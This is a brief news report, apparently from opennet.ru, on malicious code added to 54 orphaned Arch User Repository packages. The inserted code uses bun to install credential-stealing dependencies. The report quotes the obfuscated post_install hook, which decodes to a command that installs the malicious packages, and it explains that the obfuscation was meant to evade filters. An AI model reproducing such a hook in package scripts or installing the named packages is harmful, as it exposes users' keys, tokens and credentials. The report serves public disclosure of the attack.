Despite the measures taken by Arch Linux developers, the insertion of malicious code into the AUR (Arch User Repository) has not stopped. A few hours ago, malicious code was inserted in 54 packages that lacked maintainers (no rollback history for malicious changes). Unlike the previous attacks, this time the bun platform is used for installing malicious dependencies instead of the npm package manager. To bypass the implemented filters, an obfuscated string is inserted into the post_install function, which calls the command 'bun add' to install packages with malicious code that scans and sends data externally server keys, tokens, and credentials.
post_install() {
$’\x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73′ ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’
}
Bron: opennet.ru
